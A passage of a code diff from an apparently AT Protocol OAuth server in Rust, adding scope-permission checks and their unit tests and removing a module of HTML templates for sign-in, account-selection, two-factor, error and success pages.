self.parsed.iter().filter_map(|p| {
103
+
if let ParsedScope::Identity(i) = p {
104
+
Some(i)
105
+
} else {
106
+
None
107
+
}
108
+
})
109
+
}
110
+
111
+
pub fn assert_repo(&self, action: RepoAction, collection: &str) -> Result<(), ScopeError> {
112
+
if self.has_atproto || self.has_transition_generic {
113
+
return Ok(());
114
+
}
115
+
116
+
for repo_scope in self.find_repo_scopes() {
117
+
if !repo_scope.actions.contains(&action) {
118
+
continue;
119
+
}
120
+
121
+
match &repo_scope.collection {
122
+
None => return Ok(()),
123
+
Some(coll) if coll == collection => return Ok(()),
124
+
Some(coll) if coll.ends_with(".*") => {
125
+
let prefix = coll.strip_suffix(".*").unwrap();
126
+
if collection.starts_with(prefix)
127
+
&& collection.chars().nth(prefix.len()) == Some('.')
128
+
{
129
+
return Ok(());
130
+
}
131
+
}
132
+
_ => {}
133
+
}
134
+
}
135
+
136
+
Err(ScopeError::InsufficientScope {
137
+
required: format!("repo:{}?action={}", collection, action_str(action)),
138
+
message: format!(
139
+
"Insufficient scope to {} records in {}",
140
+
action_str(action),
141
+
collection
142
+
),
143
+
})
144
+
}
145
+
146
+
pub fn assert_blob(&self, mime: &str) -> Result<(), ScopeError> {
147
+
if self.has_atproto || self.has_transition_generic {
148
+
return Ok(());
149
+
}
150
+
151
+
for blob_scope in self.find_blob_scopes() {
152
+
if blob_scope.matches_mime(mime) {
153
+
return Ok(());
154
+
}
155
+
}
156
+
157
+
Err(ScopeError::InsufficientScope {
158
+
required: format!("blob:{}", mime),
159
+
message: format!("Insufficient scope to upload blob with mime type {}", mime),
160
+
})
161
+
}
162
+
163
+
pub fn assert_rpc(&self, aud: &str, lxm: &str) -> Result<(), ScopeError> {
164
+
if self.has_atproto || self.has_transition_generic {
165
+
return Ok(());
166
+
}
167
+
168
+
if lxm.starts_with("chat.bsky.") && self.has_transition_chat {
169
+
return Ok(());
170
+
}
171
+
172
+
for rpc_scope in self.find_rpc_scopes() {
173
+
let lxm_matches = match &rpc_scope.lxm {
174
+
None => true,
175
+
Some(scope_lxm) if scope_lxm == lxm => true,
176
+
Some(scope_lxm) if scope_lxm.ends_with(".*") => {
177
+
let prefix = scope_lxm.strip_suffix(".*").unwrap();
178
+
lxm.starts_with(prefix) && lxm.chars().nth(prefix.len()) == Some('.')
179
+
}
180
+
_ => false,
181
+
};
182
+
183
+
let aud_matches = match &rpc_scope.aud {
184
+
None => true,
185
+
Some(scope_aud) if scope_aud == "*" => true,
186
+
Some(scope_aud) => scope_aud == aud,
187
+
};
188
+
189
+
if lxm_matches && aud_matches {
190
+
return Ok(());
191
+
}
192
+
}
193
+
194
+
Err(ScopeError::InsufficientScope {
195
+
required: format!("rpc:{}?aud={}", lxm, aud),
196
+
message: format!("Insufficient scope to call {} on {}", lxm, aud),
197
+
})
198
+
}
199
+
200
+
pub fn assert_account(
201
+
&self,
202
+
attr: AccountAttr,
203
+
action: AccountAction,
204
+
) -> Result<(), ScopeError> {
205
+
if self.has_atproto || self.has_transition_generic {
206
+
return Ok(());
207
+
}
208
+
209
+
if attr == AccountAttr::Email && action == AccountAction::Read && self.has_transition_email
210
+
{
211
+
return Ok(());
212
+
}
213
+
214
+
for account_scope in self.find_account_scopes() {
215
+
if account_scope.attr == attr && account_scope.action == action {
216
+
return Ok(());
217
+
}
218
+
if account_scope.attr == attr && account_scope.action == AccountAction::Manage {
219
+
return Ok(());
220
+
}
221
+
}
222
+
223
+
Err(ScopeError::InsufficientScope {
224
+
required: format!(
225
+
"account:{}?action={}",
226
+
attr_str(attr),
227
+
action_str_account(action)
228
+
),
229
+
message: format!(
230
+
"Insufficient scope to {} account {}",
231
+
action_str_account(action),
232
+
attr_str(attr)
233
+
),
234
+
})
235
+
}
236
+
237
+
pub fn allows_email_read(&self) -> bool {
238
+
self.has_atproto
239
+
|| self.has_transition_generic
240
+
|| self.has_transition_email
241
+
|| self
242
+
.find_account_scopes()
243
+
.any(|a| a.attr == AccountAttr::Email)
244
+
}
245
+
246
+
pub fn allows_repo(&self, action: RepoAction, collection: &str) -> bool {
247
+
self.assert_repo(action, collection).is_ok()
248
+
}
249
+
250
+
pub fn allows_blob(&self, mime: &str) -> bool {
251
+
self.assert_blob(mime).is_ok()
252
+
}
253
+
254
+
pub fn allows_rpc(&self, aud: &str, lxm: &str) -> bool {
255
+
self.assert_rpc(aud, lxm).is_ok()
256
+
}
257
+
258
+
pub fn allows_account(&self, attr: AccountAttr, action: AccountAction) -> bool {
259
+
self.assert_account(attr, action).is_ok()
260
+
}
261
+
262
+
pub fn assert_identity(&self, attr: IdentityAttr) -> Result<(), ScopeError> {
263
+
if self.has_atproto || self.has_transition_generic {
264
+
return Ok(());
265
+
}
266
+
267
+
for identity_scope in self.find_identity_scopes() {
268
+
if identity_scope.attr == IdentityAttr::Wildcard {
269
+
return Ok(());
270
+
}
271
+
if identity_scope.attr == attr {
272
+
return Ok(());
273
+
}
274
+
}
275
+
276
+
Err(ScopeError::InsufficientScope {
277
+
required: format!("identity:{}", identity_attr_str(attr)),
278
+
message: format!(
279
+
"Insufficient scope to modify identity {}",
280
+
identity_attr_str(attr)
281
+
),
282
+
})
283
+
}
284
+
285
+
pub fn allows_identity(&self, attr: IdentityAttr) -> bool {
286
+
self.assert_identity(attr).is_ok()
287
+
}
288
+
}
289
+
290
+
fn action_str(action: RepoAction) -> &'static str {
291
+
match action {
292
+
RepoAction::Create => "create",
293
+
RepoAction::Update => "update",
294
+
RepoAction::Delete => "delete",
295
+
}
296
+
}
297
+
298
+
fn attr_str(attr: AccountAttr) -> &'static str {
299
+
match attr {
300
+
AccountAttr::Email => "email",
301
+
AccountAttr::Handle => "handle",
302
+
AccountAttr::Repo => "repo",
303
+
AccountAttr::Status => "status",
304
+
}
305
+
}
306
+
307
+
fn identity_attr_str(attr: IdentityAttr) -> &'static str {
308
+
match attr {
309
+
IdentityAttr::Handle => "handle",
310
+
IdentityAttr::Wildcard => "*",
311
+
}
312
+
}
313
+
314
+
fn action_str_account(action: AccountAction) -> &'static str {
315
+
match action {
316
+
AccountAction::Read => "read",
317
+
AccountAction::Manage => "manage",
318
+
}
319
+
}
320
+
321
+
impl Default for ScopePermissions {
322
+
fn default() -> Self {
323
+
Self::from_scope_string(Some("atproto"))
324
+
}
325
+
}
326
+
327
+
#[cfg(test)]
328
+
mod tests {
329
+
use super::*;
330
+
331
+
#[test]
332
+
fn test_atproto_scope_allows_everything() {
333
+
let perms = ScopePermissions::from_scope_string(Some("atproto"));
334
+
assert!(perms.has_full_access());
335
+
assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
336
+
assert!(perms.allows_blob("image/png"));
337
+
assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline"));
338
+
assert!(perms.allows_account(AccountAttr::Email, AccountAction::Manage));
339
+
}
340
+
341
+
#[test]
342
+
fn test_transition_generic_allows_everything() {
343
+
let perms = ScopePermissions::from_scope_string(Some("transition:generic"));
344
+
assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
345
+
assert!(perms.allows_blob("image/png"));
346
+
}
347
+
348
+
#[test]
349
+
fn test_transition_chat_only_allows_chat() {
350
+
let perms = ScopePermissions::from_scope_string(Some("transition:chat.bsky"));
351
+
assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
352
+
assert!(perms.allows_rpc("did:web:api.bsky.app", "chat.bsky.convo.getMessages"));
353
+
assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline"));
354
+
}
355
+
356
+
#[test]
357
+
fn test_empty_scope_defaults_to_atproto() {
358
+
let perms = ScopePermissions::from_scope_string(None);
359
+
assert!(perms.has_full_access());
360
+
}
361
+
362
+
#[test]
363
+
fn test_multiple_scopes() {
364
+
let perms = ScopePermissions::from_scope_string(Some("atproto transition:chat.bsky"));
365
+
assert!(perms.has_scope("atproto"));
366
+
assert!(perms.has_scope("transition:chat.bsky"));
367
+
assert!(!perms.has_scope("transition:generic"));
368
+
}
369
+
370
+
#[test]
371
+
fn test_transition_email_allows_email_read() {
372
+
let perms = ScopePermissions::from_scope_string(Some("transition:email"));
373
+
assert!(perms.allows_email_read());
374
+
assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read));
375
+
assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage));
376
+
assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
377
+
}
378
+
379
+
#[test]
380
+
fn test_granular_repo_wildcard() {
381
+
let perms =
382
+
ScopePermissions::from_scope_string(Some("atproto repo:*?action=create blob:*/*"));
383
+
assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
384
+
assert!(perms.allows_repo(RepoAction::Create, "any.collection"));
385
+
assert!(perms.allows_blob("image/png"));
386
+
}
387
+
388
+
#[test]
389
+
fn test_granular_repo_collection_specific() {
390
+
let perms = ScopePermissions::from_scope_string(Some(
391
+
"repo:app.bsky.feed.post?action=create&action=delete",
392
+
));
393
+
assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post"));
394
+
assert!(perms.allows_repo(RepoAction::Delete, "app.bsky.feed.post"));
395
+
assert!(!perms.allows_repo(RepoAction::Update, "app.bsky.feed.post"));
396
+
assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.like"));
397
+
}
398
+
399
+
#[test]
400
+
fn test_granular_blob_specific_mime() {
401
+
let perms = ScopePermissions::from_scope_string(Some("blob?accept=image/*&accept=video/*"));
402
+
assert!(perms.allows_blob("image/png"));
403
+
assert!(perms.allows_blob("image/jpeg"));
404
+
assert!(perms.allows_blob("video/mp4"));
405
+
assert!(!perms.allows_blob("text/plain"));
406
+
assert!(!perms.allows_blob("application/json"));
407
+
}
408
+
409
+
#[test]
410
+
fn test_granular_rpc() {
411
+
let perms = ScopePermissions::from_scope_string(Some(
412
+
"rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app",
413
+
));
414
+
assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline"));
415
+
assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed"));
416
+
assert!(!perms.allows_rpc("did:web:other.service", "app.bsky.feed.getTimeline"));
417
+
}
418
+
419
+
#[test]
420
+
fn test_granular_rpc_wildcard_aud() {
421
+
let perms =
422
+
ScopePermissions::from_scope_string(Some("rpc:app.bsky.feed.getTimeline?aud=*"));
423
+
assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline"));
424
+
assert!(perms.allows_rpc("did:web:any.service", "app.bsky.feed.getTimeline"));
425
+
assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed"));
426
+
}
427
+
428
+
#[test]
429
+
fn test_granular_account() {
430
+
let perms = ScopePermissions::from_scope_string(Some("account:email?action=read"));
431
+
assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read));
432
+
assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage));
433
+
assert!(!perms.allows_account(AccountAttr::Handle, AccountAction::Read));
434
+
435
+
let perms2 = ScopePermissions::from_scope_string(Some("account:repo?action=manage"));
436
+
assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Manage));
437
+
assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Read));
438
+
}
439
+
440
+
#[test]
441
+
fn test_granular_scopes_without_atproto() {
442
+
let perms = ScopePermissions::from_scope_string(Some("repo:*?action=create"));
443
+
assert!(!perms.has_full_access());
444
+
assert!(perms.allows_repo(RepoAction::Create, "any.collection"));
445
+
assert!(!perms.allows_repo(RepoAction::Update, "any.collection"));
446
+
assert!(!perms.allows_repo(RepoAction::Delete, "any.collection"));
447
+
}
448
+
449
+
#[test]
450
+
fn test_pdsls_style_scopes() {
451
+
let perms = ScopePermissions::from_scope_string(Some(
452
+
"atproto repo:*?action=create repo:*?action=update repo:*?action=delete blob:*/*",
453
+
));
454
+
assert!(perms.allows_repo(RepoAction::Create, "any.collection"));
455
+
assert!(perms.allows_repo(RepoAction::Update, "any.collection"));
456
+
assert!(perms.allows_repo(RepoAction::Delete, "any.collection"));
457
+
assert!(perms.allows_blob("image/png"));
458
+
assert!(perms.allows_blob("video/mp4"));
459
+
}
460
+
461
+
#[test]
462
+
fn test_identity_scope_handle() {
463
+
let perms = ScopePermissions::from_scope_string(Some("identity:handle"));
464
+
assert!(perms.allows_identity(IdentityAttr::Handle));
465
+
assert!(!perms.allows_identity(IdentityAttr::Wildcard));
466
+
}
467
+
468
+
#[test]
469
+
fn test_identity_scope_wildcard() {
470
+
let perms = ScopePermissions::from_scope_string(Some("identity:*"));
471
+
assert!(perms.allows_identity(IdentityAttr::Handle));
472
+
assert!(perms.allows_identity(IdentityAttr::Wildcard));
473
+
}
474
+
475
+
#[test]
476
+
fn test_identity_scope_with_atproto() {
477
+
let perms = ScopePermissions::from_scope_string(Some("atproto"));
478
+
assert!(perms.allows_identity(IdentityAttr::Handle));
479
+
assert!(perms.allows_identity(IdentityAttr::Wildcard));
480
+
}
481
+
482
+
#[test]
483
+
fn test_account_status_scope() {
484
+
let perms = ScopePermissions::from_scope_string(Some("account:status?action=read"));
485
+
assert!(perms.allows_account(AccountAttr::Status, AccountAction::Read));
486
+
assert!(!perms.allows_account(AccountAttr::Status, AccountAction::Manage));
487
+
}
488
+
}
-595
src/oauth/templates.rs
-595
src/oauth/templates.rs
···
1
-
use chrono::{DateTime, Utc};
2
-
3
-
fn format_scope_for_display(scope: Option<&str>) -> String {
4
-
let scope = scope.unwrap_or("");
5
-
if scope.is_empty() || scope.contains("atproto") || scope.contains("transition:generic") {
6
-
return "access your account".to_string();
7
-
}
8
-
let parts: Vec<&str> = scope.split_whitespace().collect();
9
-
let friendly: Vec<&str> = parts
10
-
.iter()
11
-
.filter_map(|s| {
12
-
match *s {
13
-
"atproto" | "transition:generic" | "transition:chat.bsky" => None,
14
-
"read" => Some("read your data"),
15
-
"write" => Some("write data"),
16
-
other => Some(other),
17
-
}
18
-
})
19
-
.collect();
20
-
if friendly.is_empty() {
21
-
"access your account".to_string()
22
-
} else {
23
-
friendly.join(", ")
24
-
}
25
-
}
26
-
27
-
fn base_styles() -> &'static str {
28
-
r#"
29
-
:root {
30
-
--bg-primary: #fafafa;
31
-
--bg-secondary: #f9f9f9;
32
-
--bg-card: #ffffff;
33
-
--bg-input: #ffffff;
34
-
--text-primary: #333333;
35
-
--text-secondary: #666666;
36
-
--text-muted: #999999;
37
-
--border-color: #dddddd;
38
-
--border-color-light: #cccccc;
39
-
--accent: #0066cc;
40
-
--accent-hover: #0052a3;
41
-
--success-bg: #dfd;
42
-
--success-border: #8c8;
43
-
--success-text: #060;
44
-
--error-bg: #fee;
45
-
--error-border: #fcc;
46
-
--error-text: #c00;
47
-
}
48
-
@media (prefers-color-scheme: dark) {
49
-
:root {
50
-
--bg-primary: #1a1a1a;
51
-
--bg-secondary: #242424;
52
-
--bg-card: #2a2a2a;
53
-
--bg-input: #333333;
54
-
--text-primary: #e0e0e0;
55
-
--text-secondary: #a0a0a0;
56
-
--text-muted: #707070;
57
-
--border-color: #404040;
58
-
--border-color-light: #505050;
59
-
--accent: #4da6ff;
60
-
--accent-hover: #7abbff;
61
-
--success-bg: #1a3d1a;
62
-
--success-border: #2d5a2d;
63
-
--success-text: #7bc67b;
64
-
--error-bg: #3d1a1a;
65
-
--error-border: #5a2d2d;
66
-
--error-text: #ff7b7b;
67
-
}
68
-
}
69
-
* {
70
-
box-sizing: border-box;
71
-
margin: 0;
72
-
padding: 0;
73
-
}
74
-
body {
75
-
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
76
-
background: var(--bg-primary);
77
-
color: var(--text-primary);
78
-
min-height: 100vh;
79
-
line-height: 1.5;
80
-
}
81
-
.container {
82
-
max-width: 400px;
83
-
margin: 4rem auto;
84
-
padding: 2rem;
85
-
}
86
-
h1 {
87
-
margin: 0 0 0.5rem 0;
88
-
font-weight: 600;
89
-
}
90
-
.subtitle {
91
-
color: var(--text-secondary);
92
-
margin: 0 0 2rem 0;
93
-
}
94
-
.subtitle strong {
95
-
color: var(--text-primary);
96
-
}
97
-
.client-info {
98
-
background: var(--bg-secondary);
99
-
border: 1px solid var(--border-color);
100
-
border-radius: 8px;
101
-
padding: 1rem;
102
-
margin-bottom: 1.5rem;
103
-
}
104
-
.client-info .client-name {
105
-
font-weight: 500;
106
-
color: var(--text-primary);
107
-
display: block;
108
-
margin-bottom: 0.25rem;
109
-
}
110
-
.client-info .scope {
111
-
color: var(--text-secondary);
112
-
font-size: 0.875rem;
113
-
}
114
-
.error-banner {
115
-
background: var(--error-bg);
116
-
border: 1px solid var(--error-border);
117
-
color: var(--error-text);
118
-
border-radius: 4px;
119
-
padding: 0.75rem;
120
-
margin-bottom: 1rem;
121
-
}
122
-
.form-group {
123
-
margin-bottom: 1rem;
124
-
}
125
-
label {
126
-
display: block;
127
-
font-size: 0.875rem;
128
-
font-weight: 500;
129
-
margin-bottom: 0.25rem;
130
-
}
131
-
input[type="text"],
132
-
input[type="email"],
133
-
input[type="password"] {
134
-
width: 100%;
135
-
padding: 0.75rem;
136
-
border: 1px solid var(--border-color-light);
137
-
border-radius: 4px;
138
-
font-size: 1rem;
139
-
color: var(--text-primary);
140
-
background: var(--bg-input);
141
-
}
142
-
input[type="text"]:focus,
143
-
input[type="email"]:focus,
144
-
input[type="password"]:focus {
145
-
outline: none;
146
-
border-color: var(--accent);
147
-
}
148
-
input[type="text"]::placeholder,
149
-
input[type="email"]::placeholder,
150
-
input[type="password"]::placeholder {
151
-
color: var(--text-muted);
152
-
}
153
-
.checkbox-group {
154
-
display: flex;
155
-
align-items: center;
156
-
gap: 0.5rem;
157
-
margin-bottom: 1.5rem;
158
-
}
159
-
.checkbox-group input[type="checkbox"] {
160
-
width: 1rem;
161
-
height: 1rem;
162
-
accent-color: var(--accent);
163
-
}
164
-
.checkbox-group label {
165
-
margin-bottom: 0;
166
-
font-weight: normal;
167
-
color: var(--text-secondary);
168
-
cursor: pointer;
169
-
}
170
-
.buttons {
171
-
display: flex;
172
-
gap: 0.75rem;
173
-
}
174
-
.btn {
175
-
flex: 1;
176
-
padding: 0.75rem;
177
-
border-radius: 4px;
178
-
font-size: 1rem;
179
-
cursor: pointer;
180
-
border: none;
181
-
text-align: center;
182
-
text-decoration: none;
183
-
}
184
-
.btn-primary {
185
-
background: var(--accent);
186
-
color: white;
187
-
}
188
-
.btn-primary:hover {
189
-
background: var(--accent-hover);
190
-
}
191
-
.btn-primary:disabled {
192
-
opacity: 0.6;
193
-
cursor: not-allowed;
194
-
}
195
-
.btn-secondary {
196
-
background: transparent;
197
-
color: var(--accent);
198
-
border: 1px solid var(--accent);
199
-
}
200
-
.btn-secondary:hover {
201
-
background: var(--accent);
202
-
color: white;
203
-
}
204
-
.footer {
205
-
text-align: center;
206
-
margin-top: 1.5rem;
207
-
font-size: 0.75rem;
208
-
color: var(--text-muted);
209
-
}
210
-
.accounts {
211
-
display: flex;
212
-
flex-direction: column;
213
-
gap: 0.5rem;
214
-
margin-bottom: 1rem;
215
-
}
216
-
.account-item {
217
-
display: flex;
218
-
align-items: center;
219
-
justify-content: space-between;
220
-
width: 100%;
221
-
padding: 1rem;
222
-
background: var(--bg-card);
223
-
border: 1px solid var(--border-color);
224
-
border-radius: 8px;
225
-
cursor: pointer;
226
-
transition: border-color 0.15s, box-shadow 0.15s;
227
-
text-align: left;
228
-
}
229
-
.account-item:hover {
230
-
border-color: var(--accent);
231
-
box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15);
232
-
}
233
-
.account-info {
234
-
display: flex;
235
-
flex-direction: column;
236
-
gap: 0.25rem;
237
-
flex: 1;
238
-
min-width: 0;
239
-
}
240
-
.account-info .handle {
241
-
font-weight: 500;
242
-
color: var(--text-primary);
243
-
overflow: hidden;
244
-
text-overflow: ellipsis;
245
-
white-space: nowrap;
246
-
}
247
-
.account-info .did {
248
-
font-size: 0.75rem;
249
-
color: var(--text-muted);
250
-
font-family: monospace;
251
-
overflow: hidden;
252
-
text-overflow: ellipsis;
253
-
}
254
-
.chevron {
255
-
color: var(--text-muted);
256
-
font-size: 1.25rem;
257
-
flex-shrink: 0;
258
-
margin-left: 0.5rem;
259
-
}
260
-
.divider {
261
-
height: 1px;
262
-
background: var(--border-color);
263
-
margin: 1rem 0;
264
-
}
265
-
.new-account-link {
266
-
display: block;
267
-
text-align: center;
268
-
color: var(--accent);
269
-
text-decoration: none;
270
-
font-size: 0.875rem;
271
-
}
272
-
.new-account-link:hover {
273
-
text-decoration: underline;
274
-
}
275
-
.help-text {
276
-
text-align: center;
277
-
margin-top: 1rem;
278
-
font-size: 0.875rem;
279
-
color: var(--text-secondary);
280
-
}
281
-
.icon {
282
-
font-size: 3rem;
283
-
margin-bottom: 1rem;
284
-
}
285
-
.error-code {
286
-
background: var(--error-bg);
287
-
border: 1px solid var(--error-border);
288
-
color: var(--error-text);
289
-
padding: 0.5rem 1rem;
290
-
border-radius: 4px;
291
-
font-family: monospace;
292
-
display: inline-block;
293
-
margin-bottom: 1rem;
294
-
}
295
-
.success-icon {
296
-
width: 3rem;
297
-
height: 3rem;
298
-
border-radius: 50%;
299
-
background: var(--success-bg);
300
-
border: 1px solid var(--success-border);
301
-
color: var(--success-text);
302
-
display: flex;
303
-
align-items: center;
304
-
justify-content: center;
305
-
font-size: 1.5rem;
306
-
margin: 0 auto 1rem;
307
-
}
308
-
.text-center {
309
-
text-align: center;
310
-
}
311
-
.code-input {
312
-
letter-spacing: 0.5em;
313
-
text-align: center;
314
-
font-size: 1.5rem;
315
-
font-family: monospace;
316
-
}
317
-
"#
318
-
}
319
-
320
-
pub fn login_page(
321
-
client_id: &str,
322
-
client_name: Option<&str>,
323
-
scope: Option<&str>,
324
-
request_uri: &str,
325
-
error_message: Option<&str>,
326
-
login_hint: Option<&str>,
327
-
) -> String {
328
-
let client_display = client_name.unwrap_or(client_id);
329
-
let scope_display = format_scope_for_display(scope);
330
-
let error_html = error_message
331
-
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
332
-
.unwrap_or_default();
333
-
let login_hint_value = login_hint.unwrap_or("");
334
-
format!(
335
-
r#"<!DOCTYPE html>
336
-
<html lang="en">
337
-
<head>
338
-
<meta charset="UTF-8">
339
-
<meta name="viewport" content="width=device-width, initial-scale=1.0">
340
-
<meta name="robots" content="noindex">
341
-
<title>Sign in</title>
342
-
<style>{styles}</style>
343
-
</head>
344
-
<body>
345
-
<div class="container">
346
-
<h1>Sign In</h1>
347
-
<p class="subtitle">Sign in to continue to <strong>{client_display}</strong></p>
348
-
<div class="client-info">
349
-
<span class="client-name">{client_display}</span>
350
-
<span class="scope">wants to {scope_display}</span>
351
-
</div>
352
-
{error_html}
353
-
<form method="POST" action="/oauth/authorize">
354
-
<input type="hidden" name="request_uri" value="{request_uri}">
355
-
<div class="form-group">
356
-
<label for="username">Handle</label>
357
-
<input type="text" id="username" name="username" value="{login_hint_value}"
358
-
required autocomplete="username" autofocus
359
-
placeholder="your.handle">
360
-
</div>
361
-
<div class="form-group">
362
-
<label for="password">Password</label>
363
-
<input type="password" id="password" name="password" required
364
-
autocomplete="current-password" placeholder="Enter your password">
365
-
</div>
366
-
<div class="checkbox-group">
367
-
<input type="checkbox" id="remember_device" name="remember_device" value="true">
368
-
<label for="remember_device">Remember this device</label>
369
-
</div>
370
-
<div class="buttons">
371
-
<button type="submit" class="btn btn-primary">Sign In</button>
372
-
<button type="submit" formaction="/oauth/authorize/deny" formnovalidate class="btn btn-secondary">Cancel</button>
373
-
</div>
374
-
</form>
375
-
<p class="help-text">
376
-
By signing in, you agree to share your account information with this application.
377
-
</p>
378
-
</div>
379
-
</body>
380
-
</html>"#,
381
-
styles = base_styles(),
382
-
client_display = html_escape(client_display),
383
-
scope_display = html_escape(&scope_display),
384
-
request_uri = html_escape(request_uri),
385
-
error_html = error_html,
386
-
login_hint_value = html_escape(login_hint_value),
387
-
)
388
-
}
389
-
390
-
pub struct DeviceAccount {
391
-
pub did: String,
392
-
pub handle: String,
393
-
pub email: Option<String>,
394
-
pub last_used_at: DateTime<Utc>,
395
-
}
396
-
397
-
pub fn account_selector_page(
398
-
client_id: &str,
399
-
client_name: Option<&str>,
400
-
request_uri: &str,
401
-
accounts: &[DeviceAccount],
402
-
) -> String {
403
-
let client_display = client_name.unwrap_or(client_id);
404
-
let accounts_html: String = accounts
405
-
.iter()
406
-
.map(|account| {
407
-
format!(
408
-
r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
409
-
<input type="hidden" name="request_uri" value="{request_uri}">
410
-
<input type="hidden" name="did" value="{did}">
411
-
<button type="submit" class="account-item">
412
-
<div class="account-info">
413
-
<span class="handle">@{handle}</span>
414
-
<span class="did">{did}</span>
415
-
</div>
416
-
<span class="chevron">›</span>
417
-
</button>
418
-
</form>"#,
419
-
request_uri = html_escape(request_uri),
420
-
did = html_escape(&account.did),
421
-
handle = html_escape(&account.handle),
422
-
)
423
-
})
424
-
.collect();
425
-
format!(
426
-
r#"<!DOCTYPE html>
427
-
<html lang="en">
428
-
<head>
429
-
<meta charset="UTF-8">
430
-
<meta name="viewport" content="width=device-width, initial-scale=1.0">
431
-
<meta name="robots" content="noindex">
432
-
<title>Choose an account</title>
433
-
<style>{styles}</style>
434
-
</head>
435
-
<body>
436
-
<div class="container">
437
-
<h1>Sign In</h1>
438
-
<p class="subtitle">Choose an account to continue to <strong>{client_display}</strong></p>
439
-
<div class="accounts">
440
-
{accounts_html}
441
-
</div>
442
-
<div class="divider"></div>
443
-
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
444
-
Sign in to another account
445
-
</a>
446
-
</div>
447
-
</body>
448
-
</html>"#,
449
-
styles = base_styles(),
450
-
client_display = html_escape(client_display),
451
-
accounts_html = accounts_html,
452
-
request_uri_encoded = urlencoding::encode(request_uri),
453
-
)
454
-
}
455
-
456
-
pub fn two_factor_page(request_uri: &str, channel: &str, error_message: Option<&str>) -> String {
457
-
let error_html = error_message
458
-
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
459
-
.unwrap_or_default();
460
-
let (title, subtitle) = match channel {
461
-
"email" => (
462
-
"Check Your Email",
463
-
"We sent a verification code to your email",
464
-
),
465
-
"Discord" => (
466
-
"Check Discord",
467
-
"We sent a verification code to your Discord",
468
-
),
469
-
"Telegram" => (
470
-
"Check Telegram",
471
-
"We sent a verification code to your Telegram",
472
-
),
473
-
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
474
-
_ => ("Check Your Messages", "We sent you a verification code"),
475
-
};
476
-
format!(
477
-
r#"<!DOCTYPE html>
478
-
<html lang="en">
479
-
<head>
480
-
<meta charset="UTF-8">
481
-
<meta name="viewport" content="width=device-width, initial-scale=1.0">
482
-
<meta name="robots" content="noindex">
483
-
<title>Verify your identity</title>
484
-
<style>{styles}</style>
485
-
</head>
486
-
<body>
487
-
<div class="container">
488
-
<h1>{title}</h1>
489
-
<p class="subtitle">{subtitle}</p>
490
-
{error_html}
491
-
<form method="POST" action="/oauth/authorize/2fa">
492
-
<input type="hidden" name="request_uri" value="{request_uri}">
493
-
<div class="form-group">
494
-
<label for="code">Verification Code</label>
495
-
<input type="text" id="code" name="code" class="code-input"
496
-
placeholder="000000"
497
-
pattern="[0-9]{{6}}" maxlength="6"
498
-
inputmode="numeric" autocomplete="one-time-code"
499
-
autofocus required>
500
-
</div>
501
-
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
502
-
</form>
503
-
<p class="help-text">
504
-
Code expires in 10 minutes.
505
-
</p>
506
-
</div>
507
-
</body>
508
-
</html>"#,
509
-
styles = base_styles(),
510
-
title = title,
511
-
subtitle = subtitle,
512
-
request_uri = html_escape(request_uri),
513
-
error_html = error_html,
514
-
)
515
-
}
516
-
517
-
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
518
-
let description =
519
-
error_description.unwrap_or("An error occurred during the authorization process.");
520
-
format!(
521
-
r#"<!DOCTYPE html>
522
-
<html lang="en">
523
-
<head>
524
-
<meta charset="UTF-8">
525
-
<meta name="viewport" content="width=device-width, initial-scale=1.0">
526
-
<meta name="robots" content="noindex">
527
-
<title>Authorization Error</title>
528
-
<style>{styles}</style>
529
-
</head>
530
-
<body>
531
-
<div class="container text-center">
532
-
<h1>Authorization Failed</h1>
533
-
<div class="error-code">{error}</div>
534
-
<p class="subtitle" style="margin-bottom:0">{description}</p>
535
-
<div style="margin-top:1.5rem">
536
-
<button onclick="window.close()" class="btn btn-secondary" style="width:100%">Close this window</button>
537
-
</div>
538
-
</div>
539
-
</body>
540
-
</html>"#,
541
-
styles = base_styles(),
542
-
error = html_escape(error),
543
-
description = html_escape(description),
544
-
)
545
-
}
546
-
547
-
pub fn success_page(client_name: Option<&str>) -> String {
548
-
let client_display = client_name.unwrap_or("The application");
549
-
format!(
550
-
r#"<!DOCTYPE html>
551
-
<html lang="en">
552
-
<head>
553
-
<meta charset="UTF-8">
554
-
<meta name="viewport" content="width=device-width, initial-scale=1.0">
555
-
<meta name="robots" content="noindex">
556
-
<title>Authorization Successful</title>
557
-
<style>{styles}</style>
558
-
</head>
559
-
<body>
560
-
<div class="container text-center">
561
-
<div class="success-icon">✓</div>
562
-
<h1 style="color:var(--success-text)">Authorization Successful</h1>
563
-
<p class="subtitle">{client_display} has been granted access to your account.</p>
564
-
<p class="help-text">You can close this window and return to the application.</p>
565
-
</div>
566
-
</body>
567
-
</html>"#,
568
-
styles = base_styles(),
569
-
client_display = html_escape(client_display),
570
-
)
571
-
}
572
-
573
